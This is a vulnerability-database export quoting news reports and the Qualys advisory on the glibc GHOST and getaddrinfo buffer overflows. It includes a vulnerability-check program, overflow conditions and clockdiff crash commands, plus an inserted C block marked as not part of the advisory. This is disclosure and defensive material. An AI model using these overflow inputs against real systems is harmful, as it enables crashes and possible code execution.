\n\n * **Disable XML-RPC**\nIf you do not use XML-RPC, it is possible to disable it altogether. There are even [WordPress plugins](<https://wordpress.org/plugins/prevent-xmlrpc/>) that disable XML-RPC completely.\n\n * **Disable Pingback Requests**\nYou may also disable the pingback feature by adding the following code to your **functions.php** file:\n\n> _add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['pingback.ping'] ); return $methods; } );_\n", "modified": "2015-01-30T10:53:39", "published": "2015-01-29T23:53:00", "id": "THN:3DD8F9ADFFEB290F33825414D41B0F41", "href": "https://thehackernews.com/2015/01/ghost-linux-security-vulnerability_29.html", "type": "thn", "title": "GHOST glibc Vulnerability Affects WordPress and PHP applications", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T09:17:34", "bulletinFamily": "info", "description": "A highly critical vulnerability has been unearthed in the **GNU C Library (glibc)**, a widely used component of most Linux distributions, that could allow attackers to execute malicious code on servers and remotely gain control of Linux machines.\n\nThe vulnerability, dubbed \"**GHOST**\" and assigned _[CVE-2015-0235](<http://seclists.org/oss-sec/2015/q1/283>)_, was discovered and disclosed on Tuesday by security researchers from the Redwood Shores, California-based security firm Qualys.\n\n**AS CRITICAL AS HEARTBLEED AND SHELLSHOCK**\n\nGHOST is considered critical because hackers could exploit it to silently gain complete control of a targeted Linux system without any prior knowledge of system credentials (i.e. administrative passwords). 
\n\nThe flaw represents an immense Internet threat, in some ways similar to the **[Heartbleed](<https://thehackernews.com/2014/04/heartbleed-bug-explained-10-most.html>)**, **[Shellshock](<https://thehackernews.com/2014/09/Shellshock-Bash-Vulnerability-exploit.html>)** and **[Poodle](<https://thehackernews.com/2014/10/poodle-ssl-30-attack-exploits-widely_14.html>)** bugs that came to light last year.\n\n**WHY GHOST?**\n\nThe vulnerability in the GNU C Library (glibc) is dubbed GHOST because it can be triggered by the library's _gethostbyname family of functions_. Glibc is a collection of open-source software written in the C and C++ languages that defines system calls.\n\nThe problem actually originates from a heap-based buffer overflow found in the **__nss_hostname_digits_dots()** function in glibc. This function is invoked in particular by the **gethostbyname()** and **gethostbyname2()** function calls.\n\nAccording to the researchers, a remote attacker able to make an application call either of these functions could exploit the vulnerability to execute arbitrary code with the permissions of the user running the application.\n\n**EXPLOIT CODE**\n\nTo highlight the severity of the risk, the security researchers wrote proof-of-concept exploit code capable of carrying out a full-fledged remote code execution attack against the [Exim mail server](<http://exim.org/>). 
\n\nThe researchers\u2019 exploit is able to bypass all existing exploit protections (ASLR, PIE and NX, that is, address space layout randomization, position-independent executables and no-execute protection) on both 32-bit and 64-bit systems.\n\nUsing the exploit, an attacker is able to craft malicious emails that could automatically compromise a vulnerable server without the email even being opened, according to Amol Sarwate, director of engineering with Qualys.\n\nSo far, the company has not published the exploit code to the public, but it eventually plans to make the exploit available as a Metasploit module.\n\n**VERSIONS AFFECTED**\n\nThe vulnerability affects versions of glibc as far back as glibc-2.2, which was released in 2000.\n\n> \"Unfortunately, it was not recognized as a security threat; as a result, most stable and long-term-support distributions were left exposed (and still are): Debian 7 (wheezy), Red Hat Enterprise Linux 6 & 7, CentOS 6 & 7, Ubuntu 12.04, for example,\" researchers from Qualys said in an [advisory](<http://www.openwall.com/lists/oss-security/2015/01/27/9>) published Tuesday.\n\n**FIXES AVAILABLE FOR SOME LINUX DISTRIBUTIONS**\n\nHowever, major distributors of the Linux operating system, including **[Red Hat](<https://rhn.redhat.com/errata/RHSA-2015-0090.html>)**, **[Debian](<https://security-tracker.debian.org/tracker/CVE-2015-0235>)** and **[Ubuntu](<https://launchpad.net/ubuntu/+source/eglibc>)**, updated their software on Tuesday to thwart the serious cyber threat. To complete the update, either the core services that use glibc or the entire affected server must be restarted.\n\nRed Hat, the No. 
1 provider of Linux software to businesses, recommends that its customers update their systems _\"as soon as possible to mitigate any potential risk.\"_\n", "modified": "2016-08-04T08:10:47", "published": "2015-01-27T21:17:00", "id": "THN:A649F4ABCE9B99052139693A13D95B14", "href": "https://thehackernews.com/2015/01/ghost-linux-security-vulnerability27.html", "type": "thn", "title": "Critical GHOST vulnerability affects most Linux Systems", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T10:06:54", "bulletinFamily": "info", "description": "A highly critical vulnerability has been uncovered in the **GNU C Library (glibc)**, a key component of most Linux distributions, that leaves nearly all Linux machines, thousands of apps and electronic devices vulnerable to hackers who can take full control over them.\n\nJust clicking on a link or connecting to a server can result in remote code execution (RCE), allowing hackers to steal credentials, spy on users, seize control of computers, and more.\n\nThe vulnerability is similar to last year's [GHOST vulnerability](<https://thehackernews.com/2015/01/ghost-linux-security-vulnerability27.html>) (CVE-2015-0235), which left countless machines vulnerable to _remote code execution (RCE) attacks_, representing a major Internet threat.\n\nThe GNU C Library (glibc) is a collection of open source code that powers thousands of standalone apps and most Linux distributions, including those distributed to routers and other types of hardware.\n\nThe recent flaw, indexed as _CVE-2015-7547_, is a **stack-based buffer overflow** vulnerability in glibc's DNS client-side resolver, which is used to translate human-readable domain names, like google.com, into a network IP address.\n\nThe buffer overflow flaw is triggered 
when the _getaddrinfo() library function_ that performs domain-name lookups is in use, allowing hackers to remotely execute malicious code.\n\n### How Does the Flaw Work?\n\nThe flaw can be exploited when an affected device or app makes queries to a malicious DNS server that returns too much information in response to a lookup request and floods the program's memory with code.\n\nThis code then compromises the vulnerable application or device and tries to take control of the whole system.\n\nIt is possible to inject the domain name into server log files, which when resolved will trigger remote code execution. An SSH (Secure Shell) client connecting to a server could also be compromised.\n\nHowever, an attacker needs to bypass several operating system security mechanisms \u2013 _like ASLR and non-executable stack protection_ \u2013 in order to achieve a successful RCE attack.\n\nAlternatively, an attacker on your network could perform **man-in-the-middle** (MitM) attacks and tamper with DNS replies with a view to monitoring and manipulating (injecting payloads of malicious code into) data flowing between a vulnerable device and the Internet.\n\n### Affected Software and Devices\n\nAll versions of glibc after 2.9 are vulnerable. 
Therefore, any software or application that connects to things on a network or the Internet and uses glibc is at RISK.\n\nThe widely used SSH, sudo, and curl utilities are all known to be affected by the buffer overflow bug, and security researchers warn that the list of other affected applications or code is almost too diverse and numerous to enumerate completely.\n\nThe vulnerability could extend to nearly all major software, including:\n\n * Virtually all distributions of Linux.\n * Programming languages such as Python, PHP, and Ruby on Rails.\n * Many others that use Linux code to look up the numerical IP address of an Internet domain.\n * Most Bitcoin software is [reportedly vulnerable](<https://thehackernews.com/2015/01/ghost-linux-security-vulnerability27.html>), too.\n\n### Who Is Not Affected\n\nThe good news is that users of Google's Android mobile operating system aren't vulnerable to this flaw, as the company uses a glibc substitute known as Bionic that is not susceptible, according to a Google representative.\n\nAdditionally, a lot of embedded Linux devices, including home routers and various gadgets, are not affected by the bug because these devices use the **uClibc** library, which is more lightweight than the hefty glibc.\n\nThe vulnerability was first introduced in May 2008 but was [reported](<https://sourceware.org/bugzilla/show_bug.cgi?id=18665>) to the glibc maintainers in July 2015.\n\nThe vulnerability was discovered independently by researchers at **Google** and **Red Hat**, who found that the vulnerability has likely not been publicly attacked.\n\nThe flaw was discovered when one of Google's SSH apps experienced a severe error called a segmentation fault each time it attempted to contact a particular Internet address, Google's security team reported in a [blog post](<https://googleonlinesecurity.blogspot.ca/2016/02/cve-2015-7547-glibc-getaddrinfo-stack.html>) published Monday.\n\n
\n### Where glibc went Wrong\n\nGoogle researchers figured out that the error was due to a buffer overflow bug inside the glibc library that made malicious code execution attacks possible. The researchers then notified the glibc maintainers.\n\nHere's what went wrong, according to the Google engineers:\n\n> \"glibc reserves 2048 bytes in the stack through alloca() for the DNS answer at _nss_dns_gethostbyname4_r() for hosting responses to a DNS query. Later on, at send_dg() and send_vc(), if the response is larger than 2048 bytes, a new buffer is allocated from the heap and all the information (buffer pointer, new buffer size and response size) is updated.\"\n>\n> \"Under certain conditions a mismatch between the stack buffer and the new heap allocation will happen. The final effect is that the stack buffer will be used to store the DNS response, even though the response is larger than the stack buffer and a heap buffer was allocated. This behavior leads to the stack buffer overflow.\"\n\n#### _Proof-of-Concept Exploit Released_\n\nGoogle's Fermin J. Serna released [proof-of-concept](<https://github.com/fjserna/CVE-2015-7547>) (PoC) exploit code on Tuesday.\n\nWith this PoC code, you can verify whether you are affected by this critical issue, and verify any mitigations you may wish to enact.\n\n### Patch glibc Vulnerability\n\nGoogle researchers, working with security researchers at Red Hat, have [released a patch](<https://sourceware.org/ml/libc-alpha/2016-02/msg00416.html>) to fix the programming blunder.\n\nHowever, it is now up to the community behind the Linux OS and to manufacturers to roll out the patch to their affected software and devices as soon as possible.\n\nFor people running servers, fixing the issue will be a simple process of downloading and installing the patch update.\n\nBut for other users, patching the problem may **not be so easy**. 
The apps compiled with a vulnerable glibc version should be recompiled with an updated version \u2013 a process that will take time, as users of affected apps have to wait for updates to become available from developers.\n\nMeanwhile, if you aren\u2019t able to immediately patch your instance of glibc, you can help prevent exploitation of the flaw by limiting all TCP DNS replies to 1024 bytes and dropping UDP DNS packets larger than 512 bytes.\n\nFor more in-depth information on the glibc flaw, you can read Red Hat's [blog post](<https://access.redhat.com/errata/RHSA-2016:0175>).\n", "modified": "2016-02-17T08:27:51", "published": "2016-02-16T21:27:00", "id": "THN:ACBFC80659E47A5B7C81B99570749679", "href": "https://thehackernews.com/2016/02/glibc-linux-flaw.html", "type": "thn", "title": "Critical glibc Flaw Puts Linux Machines and Apps at Risk (Patch Immediately)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:12:23", "bulletinFamily": "exploit", "description": "", "modified": "2015-01-27T00:00:00", "published": "2015-01-27T00:00:00", "href": "https://packetstormsecurity.com/files/130115/Qualys-Security-Advisory-glibc-gethostbyname-Buffer-Overflow.html", "id": "PACKETSTORM:130115", "type": "packetstorm", "title": "Qualys Security Advisory - glibc gethostbyname Buffer Overflow", "sourceData": "` \nQualys Security Advisory CVE-2015-0235 \n \nGHOST: glibc gethostbyname buffer overflow \n \n \n--[ Contents ]---------------------------------------------------------------- \n \n1 - Summary \n2 - Analysis \n3 - Mitigating factors \n4 - Case studies \n5 - Exploitation \n6 - Acknowledgments \n \n \n--[ 1 - Summary ]------------------------------------------------------------- \n \nDuring a code audit performed internally at Qualys, we discovered a \nbuffer overflow in the __nss_hostname_digits_dots() function of the GNU \nC Library (glibc). 
This bug is reachable both locally and remotely via \nthe gethostbyname*() functions, so we decided to analyze it -- and its \nimpact -- thoroughly, and named this vulnerability \"GHOST\". \n \nOur main conclusions are: \n \n- Via gethostbyname() or gethostbyname2(), the overflowed buffer is \nlocated in the heap. Via gethostbyname_r() or gethostbyname2_r(), the \noverflowed buffer is caller-supplied (and may therefore be located in \nthe heap, stack, .data, .bss, etc; however, we have seen no such call \nin practice). \n \n- At most sizeof(char *) bytes can be overwritten (ie, 4 bytes on 32-bit \nmachines, and 8 bytes on 64-bit machines). Bytes can be overwritten \nonly with digits ('0'...'9'), dots ('.'), and a terminating null \ncharacter ('\\0'). \n \n- Despite these limitations, arbitrary code execution can be achieved. \nAs a proof of concept, we developed a full-fledged remote exploit \nagainst the Exim mail server, bypassing all existing protections \n(ASLR, PIE, and NX) on both 32-bit and 64-bit machines. We will \npublish our exploit as a Metasploit module in the near future. \n \n- The first vulnerable version of the GNU C Library is glibc-2.2, \nreleased on November 10, 2000. \n \n- We identified a number of factors that mitigate the impact of this \nbug. In particular, we discovered that it was fixed on May 21, 2013 \n(between the releases of glibc-2.17 and glibc-2.18). Unfortunately, it \nwas not recognized as a security threat; as a result, most stable and \nlong-term-support distributions were left exposed (and still are): \nDebian 7 (wheezy), Red Hat Enterprise Linux 6 & 7, CentOS 6 & 7, \nUbuntu 12.04, for example. \n \n \n--[ 2 - Analysis ]------------------------------------------------------------ \n \nThe vulnerable function, __nss_hostname_digits_dots(), is called \ninternally by the glibc in nss/getXXbyYY.c (the non-reentrant version) \nand nss/getXXbyYY_r.c (the reentrant version). 
However, the calls are \nsurrounded by #ifdef HANDLE_DIGITS_DOTS, a macro defined only in: \n \n- inet/gethstbynm.c \n- inet/gethstbynm2.c \n- inet/gethstbynm_r.c \n- inet/gethstbynm2_r.c \n- nscd/gethstbynm3_r.c \n \nThese files implement the gethostbyname*() family, and hence the only \nway to reach __nss_hostname_digits_dots() and its buffer overflow. The \npurpose of this function is to avoid expensive DNS lookups if the \nhostname argument is already an IPv4 or IPv6 address. \n \nThe code below comes from glibc-2.17: \n \n35 int \n36 __nss_hostname_digits_dots (const char *name, struct hostent *resbuf, \n37 char **buffer, size_t *buffer_size, \n38 size_t buflen, struct hostent **result, \n39 enum nss_status *status, int af, int *h_errnop) \n40 { \n.. \n57 if (isdigit (name[0]) || isxdigit (name[0]) || name[0] == ':') \n58 { \n59 const char *cp; \n60 char *hostname; \n61 typedef unsigned char host_addr_t[16]; \n62 host_addr_t *host_addr; \n63 typedef char *host_addr_list_t[2]; \n64 host_addr_list_t *h_addr_ptrs; \n65 char **h_alias_ptr; \n66 size_t size_needed; \n.. \n85 size_needed = (sizeof (*host_addr) \n86 + sizeof (*h_addr_ptrs) + strlen (name) + 1); \n87 \n88 if (buffer_size == NULL) \n89 { \n90 if (buflen < size_needed) \n91 { \n.. \n95 goto done; \n96 } \n97 } \n98 else if (buffer_size != NULL && *buffer_size < size_needed) \n99 { \n100 char *new_buf; \n101 *buffer_size = size_needed; \n102 new_buf = (char *) realloc (*buffer, *buffer_size); \n103 \n104 if (new_buf == NULL) \n105 { \n... \n114 goto done; \n115 } \n116 *buffer = new_buf; \n117 } \n... 
\n121 host_addr = (host_addr_t *) *buffer; \n122 h_addr_ptrs = (host_addr_list_t *) \n123 ((char *) host_addr + sizeof (*host_addr)); \n124 h_alias_ptr = (char **) ((char *) h_addr_ptrs + sizeof (*h_addr_ptrs)); \n125 hostname = (char *) h_alias_ptr + sizeof (*h_alias_ptr); \n126 \n127 if (isdigit (name[0])) \n128 { \n129 for (cp = name;; ++cp) \n130 { \n131 if (*cp == '\\0') \n132 { \n133 int ok; \n134 \n135 if (*--cp == '.') \n136 break; \n... \n142 if (af == AF_INET) \n143 ok = __inet_aton (name, (struct in_addr *) host_addr); \n144 else \n145 { \n146 assert (af == AF_INET6); \n147 ok = inet_pton (af, name, host_addr) > 0; \n148 } \n149 if (! ok) \n150 { \n... \n154 goto done; \n155 } \n156 \n157 resbuf->h_name = strcpy (hostname, name); \n... \n194 goto done; \n195 } \n196 \n197 if (!isdigit (*cp) && *cp != '.') \n198 break; \n199 } \n200 } \n... \n \nLines 85-86 compute the size_needed to store three (3) distinct entities \nin buffer: host_addr, h_addr_ptrs, and name (the hostname). Lines 88-117 \nmake sure the buffer is large enough: lines 88-97 correspond to the \nreentrant case, lines 98-117 to the non-reentrant case. \n \nLines 121-125 prepare pointers to store four (4) distinct entities in \nbuffer: host_addr, h_addr_ptrs, h_alias_ptr, and hostname. The sizeof \n(*h_alias_ptr) -- the size of a char pointer -- is missing from the \ncomputation of size_needed. \n \nThe strcpy() on line 157 should therefore allow us to write past the end \nof buffer, at most (depending on strlen(name) and alignment) 4 bytes on \n32-bit machines, or 8 bytes on 64-bit machines. There is a similar \nstrcpy() after line 200, but no buffer overflow: \n \n236 size_needed = (sizeof (*host_addr) \n237 + sizeof (*h_addr_ptrs) + strlen (name) + 1); \n... \n267 host_addr = (host_addr_t *) *buffer; \n268 h_addr_ptrs = (host_addr_list_t *) \n269 ((char *) host_addr + sizeof (*host_addr)); \n270 hostname = (char *) h_addr_ptrs + sizeof (*h_addr_ptrs); \n... 
\n289 resbuf->h_name = strcpy (hostname, name); \n \nIn order to reach the overflow at line 157, the hostname argument must \nmeet the following requirements: \n \n- Its first character must be a digit (line 127). \n \n- Its last character must not be a dot (line 135). \n \n- It must comprise only digits and dots (line 197) (we call this the \n\"digits-and-dots\" requirement). \n \n- It must be long enough to overflow the buffer. For example, the \nnon-reentrant gethostbyname*() functions initially allocate their \nbuffer with a call to malloc(1024) (the \"1-KB\" requirement). \n \n- It must be successfully parsed as an IPv4 address by inet_aton() (line \n143), or as an IPv6 address by inet_pton() (line 147). Upon careful \nanalysis of these two functions, we can further refine this \n\"inet-aton\" requirement: \n \n. It is impossible to successfully parse a \"digits-and-dots\" hostname \nas an IPv6 address with inet_pton() (':' is forbidden). Hence it is \nimpossible to reach the overflow with calls to gethostbyname2() or \ngethostbyname2_r() if the address family argument is AF_INET6. \n \n. Conclusion: inet_aton() is the only option, and the hostname must \nhave one of the following forms: \"a.b.c.d\", \"a.b.c\", \"a.b\", or \"a\", \nwhere a, b, c, d must be unsigned integers, at most 0xfffffffful, \nconverted successfully (ie, no integer overflow) by strtoul() in \ndecimal or octal (but not hexadecimal, because 'x' and 'X' are \nforbidden). \n \n \n--[ 3 - Mitigating factors ]-------------------------------------------------- \n \nThe impact of this bug is reduced significantly by the following \nreasons: \n \n- A patch already exists (since May 21, 2013), and has been applied and \ntested since glibc-2.18, released on August 12, 2013: \n \n[BZ #15014] \n* nss/getXXbyYY_r.c (INTERNAL (REENTRANT_NAME)) \n[HANDLE_DIGITS_DOTS]: Set any_service when digits-dots parsing was \nsuccessful. 
\n* nss/digits_dots.c (__nss_hostname_digits_dots): Remove \nredundant variable declarations and reallocation of buffer when \nparsing as IPv6 address. Always set NSS status when called from \nreentrant functions. Use NETDB_INTERNAL instead of TRY_AGAIN when \nbuffer too small. Correct computation of needed size. \n* nss/Makefile (tests): Add test-digits-dots. \n* nss/test-digits-dots.c: New test. \n \n- The gethostbyname*() functions are obsolete; with the advent of IPv6, \nrecent applications use getaddrinfo() instead. \n \n- Many programs, especially SUID binaries reachable locally, use \ngethostbyname() if, and only if, a preliminary call to inet_aton() \nfails. However, a subsequent call must also succeed (the \"inet-aton\" \nrequirement) in order to reach the overflow: this is impossible, and \nsuch programs are therefore safe. \n \n- Most of the other programs, especially servers reachable remotely, use \ngethostbyname() to perform forward-confirmed reverse DNS (FCrDNS, also \nknown as full-circle reverse DNS) checks. These programs are generally \nsafe, because the hostname passed to gethostbyname() has normally been \npre-validated by DNS software: \n \n. \"a string of labels each containing up to 63 8-bit octets, separated \nby dots, and with a maximum total of 255 octets.\" This makes it \nimpossible to satisfy the \"1-KB\" requirement. \n \n. Actually, glibc's DNS resolver can produce hostnames of up to \n(almost) 1025 characters (in case of bit-string labels, and special \nor non-printable characters). But this introduces backslashes ('\\\\') \nand makes it impossible to satisfy the \"digits-and-dots\" \nrequirement. 
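The size_needed arithmetic of section 2 and the four hostname requirements that follow it can be turned into a pre-check that a defender runs on an untrusted hostname (a HELO argument, a log field) before it reaches gethostbyname() on a host that is not yet patched, or simply to reproduce the advisory's figures. The C program below is an added example, not code from the Qualys advisory or from glibc: the 16-byte host_addr, the two-pointer h_addr_ptrs, the missing h_alias_ptr term and the 1024-byte initial malloc() are taken from the advisory, while the ghost_* function names and the test-name builder are my own.

```c
/*
 * Added example (not part of the Qualys advisory): models the buffer
 * arithmetic from section 2 of the advisory to decide whether a hostname
 * handed to the non-reentrant gethostbyname() would make the strcpy()
 * at line 157 write past the end of the buffer, and by how many bytes.
 */
#include <arpa/inet.h>
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define GHOST_HOST_ADDR_SIZE   16                   /* sizeof(host_addr_t)      */
#define GHOST_H_ADDR_PTRS_SIZE (2 * sizeof(char *)) /* sizeof(host_addr_list_t) */
#define GHOST_DEFAULT_BUFLEN   1024                 /* malloc(1024) in getXXbyYY.c */

/* Returns 1 if NAME meets the "digits-and-dots" and "inet-aton" requirements
 * the advisory lists after line 289 (the lines cited are glibc-2.17's). */
int ghost_name_requirements(const char *name)
{
    size_t len = strlen(name);
    struct in_addr addr;

    if (len == 0 || !isdigit((unsigned char)name[0]))   /* line 127 */
        return 0;
    if (name[len - 1] == '.')                           /* line 135 */
        return 0;
    for (size_t i = 0; i < len; i++)                    /* line 197 */
        if (!isdigit((unsigned char)name[i]) && name[i] != '.')
            return 0;
    return inet_aton(name, &addr) == 1;                 /* line 143 */
}

/* Number of bytes the strcpy() at line 157 would write beyond a buffer of
 * BUFLEN bytes, or 0 when NAME cannot reach the overflow. The non-reentrant
 * path realloc()s the buffer to size_needed when it is too small, so the
 * end of the write is always size_needed + sizeof(char *) (the h_alias_ptr
 * term missing from size_needed) and the overflow is at most sizeof(char *)
 * bytes, as section 1 states. malloc() alignment slack may absorb part of
 * it on a real heap; this function reports the raw arithmetic. */
size_t ghost_overflow_bytes(const char *name, size_t buflen)
{
    if (!ghost_name_requirements(name))
        return 0;
    size_t size_needed = GHOST_HOST_ADDR_SIZE + GHOST_H_ADDR_PTRS_SIZE
                         + strlen(name) + 1;                     /* lines 85-86 */
    size_t actual = size_needed > buflen ? size_needed : buflen; /* line 102 */
    size_t write_end = size_needed + sizeof(char *);    /* lines 121-125, 157 */
    return write_end > actual ? write_end - actual : 0;
}

/* Builds the all-zeros hostname that exactly fills a BUFLEN buffer under the
 * buggy size_needed formula (the same length the advisory's test program
 * computes). Caller frees the result. */
char *ghost_test_name(size_t buflen)
{
    size_t len = buflen - GHOST_HOST_ADDR_SIZE - GHOST_H_ADDR_PTRS_SIZE - 1;
    char *name = malloc(len + 1);
    if (name == NULL)
        return NULL;
    memset(name, '0', len);
    name[len] = '\0';
    return name;
}

int main(void)
{
    /* constructed sample inputs: ordinary addresses and names that fail a requirement */
    const char *samples[] = { "127.0.0.1", "1.2.3.4.", "0x10.1.1.1", "10.0.0.a" };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-12s overflow bytes: %zu\n", samples[i],
               ghost_overflow_bytes(samples[i], GHOST_DEFAULT_BUFLEN));

    char *name = ghost_test_name(GHOST_DEFAULT_BUFLEN);
    if (name != NULL) {
        printf("%zu-digit name overflow bytes: %zu\n", strlen(name),
               ghost_overflow_bytes(name, GHOST_DEFAULT_BUFLEN));
        free(name);
    }
    return 0;
}
```

A name that yields a non-zero result is one an unpatched gethostbyname() caller should refuse; the reentrant gethostbyname_r() with a caller-supplied buffer only reaches the overflow when size_needed fits that buffer, which is the ERANGE branch the advisory's test program relies on.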
\n \n \n--[ 4 - Case studies ]-------------------------------------------------------- \n \nIn this section, we will analyze real-world examples of programs that \ncall the gethostbyname*() functions, but we first introduce a small test \nprogram that checks whether a system is vulnerable or not: \n \n[user@fedora-19 ~]$ cat > GHOST.c << EOF \n#include <netdb.h> \n#include <stdio.h> \n#include <stdlib.h> \n#include <string.h> \n#include <errno.h> \n \n#define CANARY \"in_the_coal_mine\" \n \nstruct { \nchar buffer[1024]; \nchar canary[sizeof(CANARY)]; \n} temp = { \"buffer\", CANARY }; \n \nint main(void) { \nstruct hostent resbuf; \nstruct hostent *result; \nint herrno; \nint retval; \n \n/*** strlen (name) = size_needed - sizeof (*host_addr) - sizeof (*h_addr_ptrs) - 1; ***/ \nsize_t len = sizeof(temp.buffer) - 16*sizeof(unsigned char) - 2*sizeof(char *) - 1; \nchar name[sizeof(temp.buffer)]; \nmemset(name, '0', len); \nname[len] = '\\0'; \n \nretval = gethostbyname_r(name, &resbuf, temp.buffer, sizeof(temp.buffer), &result, &herrno); \n \nif (strcmp(temp.canary, CANARY) != 0) { \nputs(\"vulnerable\"); \nexit(EXIT_SUCCESS); \n} \nif (retval == ERANGE) { \nputs(\"not vulnerable\"); \nexit(EXIT_SUCCESS); \n} \nputs(\"should not happen\"); \nexit(EXIT_FAILURE); \n} \nEOF \n \n[user@fedora-19 ~]$ gcc GHOST.c -o GHOST \n \nOn Fedora 19 (glibc-2.17): \n \n[user@fedora-19 ~]$ ./GHOST \nvulnerable \n \nOn Fedora 20 (glibc-2.18): \n \n[user@fedora-20 ~]$ ./GHOST \nnot vulnerable \n \n----[ 4.1 - The GNU C Library ]----------------------------------------------- \n \nThe glibc itself contains a few calls to gethostbyname*() functions. In \nparticular, getaddrinfo() calls gethostbyname2_r() if, but only if, a \nfirst call to inet_aton() fails: in accordance with the \"inet-aton\" \nrequirement, these internal calls are safe. For example, \neglibc-2.13/sysdeps/posix/getaddrinfo.c: \n \nat->family = AF_UNSPEC; \n... 
\nif (__inet_aton (name, (struct in_addr *) at->addr) != 0) \n{ \nif (req->ai_family == AF_UNSPEC || req->ai_family == AF_INET) \nat->family = AF_INET; \nelse if (req->ai_family == AF_INET6 && (req->ai_flags & AI_V4MAPPED)) \n{ \n... \nat->family = AF_INET6; \n} \nelse \nreturn -EAI_ADDRFAMILY; \n... \n} \n... \nif (at->family == AF_UNSPEC && (req->ai_flags & AI_NUMERICHOST) == 0) \n{ \n... \nsize_t tmpbuflen = 512; \nchar *tmpbuf = alloca (tmpbuflen); \n... \nrc = __gethostbyname2_r (name, family, &th, tmpbuf, \ntmpbuflen, &h, &herrno); \n... \n} \n \n----[ 4.2 - mount.nfs ]------------------------------------------------------- \n \nSimilarly, mount.nfs (a SUID-root binary) is not vulnerable: \n \nif (inet_aton(hostname, &addr->sin_addr)) \nreturn 0; \nif ((hp = gethostbyname(hostname)) == NULL) { \nnfs_error(_(\"%s: can't get address for %s\\n\"), \nprogname, hostname); \nreturn -1; \n} \n \n----[ 4.3 - mtr ]------------------------------------------------------------- \n \nmtr (another SUID-root binary) is not vulnerable either, because it \ncalls getaddrinfo() instead of gethostbyname*() functions on any modern \n(ie, IPv6-enabled) system: \n \n#ifdef ENABLE_IPV6 \n/* gethostbyname2() is deprecated so we'll use getaddrinfo() instead. */ \n... \nerror = getaddrinfo( Hostname, NULL, &hints, &res ); \nif ( error ) { \nif (error == EAI_SYSTEM) \nperror (\"Failed to resolve host\"); \nelse \nfprintf (stderr, \"Failed to resolve host: %s\\n\", gai_strerror(error)); \nexit( EXIT_FAILURE ); \n} \n... \n#else \nhost = gethostbyname(Hostname); \nif (host == NULL) { \nherror(\"mtr gethostbyname\"); \nexit(1); \n} \n... 
\n#endif \n \n----[ 4.4 - iputils ]--------------------------------------------------------- \n \n------[ 4.4.1 - clockdiff ]--------------------------------------------------- \n \nclockdiff is vulnerable in a straightforward manner: \n \nhp = gethostbyname(argv[1]); \nif (hp == NULL) { \nfprintf(stderr, \"clockdiff: %s: host not found\\n\", argv[1]); \nexit(1); \n} \n \n[user@fedora-19-32b ~]$ ls -l /usr/sbin/clockdiff \n-rwxr-xr-x. 1 root root 15076 Feb 1 2013 /usr/sbin/clockdiff \n \n[user@fedora-19-32b ~]$ getcap /usr/sbin/clockdiff \n/usr/sbin/clockdiff = cap_net_raw+ep \n \n[user@fedora-19-32b ~]$ /usr/sbin/clockdiff `python -c \"print '0' * $((0x10000-16*1-2*4-1-4))\"` \n.Segmentation fault \n \n[user@fedora-19-32b ~]$ /usr/sbin/clockdiff `python -c \"print '0' * $((0x20000-16*1-2*4-1-4))\"` \nSegmentation fault \n \n[user@fedora-19-32b ~]$ dmesg \n... \n[202071.118929] clockdiff[3610]: segfault at b86711f4 ip b75de0c6 sp bfc191f0 error 6 in libc-2.17.so[b7567000+1b8000] \n[202086.144336] clockdiff[3618]: segfault at b90d0d24 ip b75bb0c6 sp bf8e9dc0 error 6 in libc-2.17.so[b7544000+1b8000] \n \n------[ 4.4.2 - ping and arping ]--------------------------------------------- \n \nping and arping call gethostbyname() and gethostbyname2(), respectively, \nif and only if inet_aton() fails first. This time, however, there is \nanother function call in between (Fedora, for example, does define \nUSE_IDN): \n \n--------[ 4.4.2.1 - ping ]---------------------------------------------------- \n \nif (inet_aton(target, &whereto.sin_addr) == 1) { \n... \n} else { \nchar *idn; \n#ifdef USE_IDN \nint rc; \n... 
\nrc = idna_to_ascii_lz(target, &idn, 0); \nif (rc != IDNA_SUCCESS) { \nfprintf(stderr, \"ping: IDN encoding failed: %s\\n\", idna_strerror(rc)); \nexit(2); \n} \n#else \nidn = target; \n#endif \nhp = gethostbyname(idn); \n \n--------[ 4.4.2.2 - arping ]-------------------------------------------------- \n \nif (inet_aton(target, &dst) != 1) { \nstruct hostent *hp; \nchar *idn = target; \n#ifdef USE_IDN \nint rc; \n \nrc = idna_to_ascii_lz(target, &idn, 0); \n \nif (rc != IDNA_SUCCESS) { \nfprintf(stderr, \"arping: IDN encoding failed: %s\\n\", idna_strerror(rc)); \nexit(2); \n} \n#endif \n \nhp = gethostbyname2(idn, AF_INET); \n \n--------[ 4.4.2.3 - Analysis ]------------------------------------------------ \n \nIf idna_to_ascii_lz() modifies the target hostname, the first call to \ninet_aton() could fail and the second call (internal to gethostbyname()) \ncould succeed. For example, idna_to_ascii_lz() transforms any Unicode \ndot-like character (0x3002, 0xFF0E, 0xFF61) into an ASCII dot (\".\"). \n \nBut it also restricts the length of a domain label to 63 characters: \nthis makes it impossible to reach 1024 bytes (the \"1-KB\" requirement) \nwith only 4 labels and 3 dots (the \"inet-aton\" requirement). \n \nUnless inet_aton() (actually, strtoul()) can be tricked into accepting \nmore than 3 dots? Indeed, idna_to_ascii_lz() does not restrict the total \nlength of a domain name. glibc supports \"thousands' grouping characters\" \n(man 3 printf); for example, sscanf(str, \"%'lu\", &ul) yields 1000 when \nprocessing any of the following input strings: \n \n- \"1,000\" in an English locale; \n- \"1 000\" in a French locale; and \n- \"1.000\" in a German or Spanish locale. \n \nstrtoul() implements this \"number grouping\" too, but its use is limited \nto internal glibc functions. Conclusion: more than 3 dots is impossible, \nand neither ping nor arping is vulnerable. 
